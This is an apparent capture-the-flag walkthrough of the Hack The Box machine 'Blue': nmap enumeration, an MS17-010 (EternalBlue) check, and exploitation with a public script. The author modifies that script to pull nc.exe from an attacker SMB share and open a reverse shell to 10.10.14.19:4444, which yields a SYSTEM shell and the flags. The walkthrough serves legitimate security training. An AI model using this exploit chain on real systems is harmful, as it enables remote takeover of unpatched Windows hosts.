Blue

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.40 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Thu Mar 24 22:03:58 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.40
Warning: 10.10.10.40 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.40
Host is up (0.14s latency).
Not shown: 61407 closed tcp ports (reset), 4119 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

# Nmap done at Thu Mar 24 22:04:28 2022 -- 1 IP address (1 host up) scanned in 30.58 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p135,139,445,49152,49153,49154,49155,49156,49157 10.10.10.40 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Thu Mar 24 22:05:28 2022 as: nmap -sCV -p135,139,445,49152,49153,49154,49155,49156,49157 -oN targeted 10.10.10.40
Nmap scan report for 10.10.10.40
Host is up (0.076s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-03-24T21:17:43
|_  start_date: 2022-03-24T21:13:36
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-03-24T21:17:44+00:00
|_clock-skew: mean: 11m11s, deviation: 1s, median: 11m10s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 24 22:06:41 2022 -- 1 IP address (1 host up) scanned in 73.06 seconds

The machine has the Windows 7 Professional operative system, and the SMB service open, and it allows guest authentication. Let's try to enumerate the SMB service a bit more with nmap by applying a series of scripts from the vuln and safe categories.

nmap --script "vuln and safe" -p445 -oN smbScan 10.10.10.40

• --script Runs a script scan script categories.

• -p scan the specific port.

• -oN save the scan result into file, in this case the smbScan file.

# Nmap 7.92 scan initiated Thu Mar 24 22:22:24 2022 as: nmap --script "vuln and safe" -p445 -oN smbScan 10.10.10.40
Nmap scan report for 10.10.10.40
Host is up (0.054s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

# Nmap done at Thu Mar 24 22:22:28 2022 -- 1 IP address (1 host up) scanned in 4.01 seconds

It looks like the machine is vulnerable to the EternalBlue (MS17-010) exploit.

EternalBlue allows remote attackers to execute arbitrary code on a target system by sending specially crafted messages to the SMBv1 server.

Exploitation

Let's clone the following GitHub repository, which will allow us to exploit the EternalBlue exploit.

git clone https://github.com/worawit/MS17-010

First, we'll have to check it the machine is really vulnerable to the EternalBlue exploit. First edit the checker.py file and add the guest username.

nano MS17-010/checker.py

USERNAME = 'guest'
PASSWORD = ''

Now execute it with Python2.

python2 MS17-010/checker.py 10.10.10.40

Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)

The machine is vulnerable to the EternalBlue exploit through various pipe names. Now let's edit the zzz_exploit.py script and add the guest username again.

nano MS17-010/zzz_exploit.py

USERNAME = 'guest'
PASSWORD = ''

Now let's find for the cmd word, and change the smb_pwn function, so it will send us a reverse shell.

def smb_pwn(conn, arch):
	smbConn = conn.get_smbconnection()
	
#	print('creating file c:\\pwned.txt on the target')
#	tid2 = smbConn.connectTree('C$')
#	fid2 = smbConn.createFile(tid2, '/pwned.txt')
#	smbConn.closeFile(tid2, fid2)
#	smbConn.disconnectTree(tid2)
	
	#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
	service_exec(conn, r'cmd /c \\10.10.14.19\smbFolder\nc.exe -e cmd 10.10.14.19 4444')
	# Note: there are many methods to get shell over SMB admin session
	# a simple method to get shell (but easily to be detected by AV) is
	# executing binary generated by "msfvenom -f exe-service ..."

The command will grab the nc.exe from a shared folder to send us the reverse shell. So let's set an SMB server with impacket on the folder in which we have the nc.exe binary.

ls -l

-rw-r--r--  1 root    root      28160 Feb 15 19:35 nc.exe

impacket-smbserver smbFolder $(pwd) -smb2support

Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Before executing the script, let's set a netcat listener on port 4444.

rlwrap nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

Finally, if we execute the zzz_exploit.py script indicating the IP address and the samr pipe name, it will grab the nc.exe binary from our shared folder to send us a reverse shell, and then all we have to do is reap the harvest and take both the user and the root flag.

python2 MS17-010/zzz_exploit.py 10.10.10.40 samr

listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.40] 49163
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

whoami
nt authority\system

type \users\haris\desktop\user.txt
a221bdab893a8249c8675bbf895d78de

type \users\administrator\desktop\root.txt
c5046883c3b47ea2a7f62919ca45e59d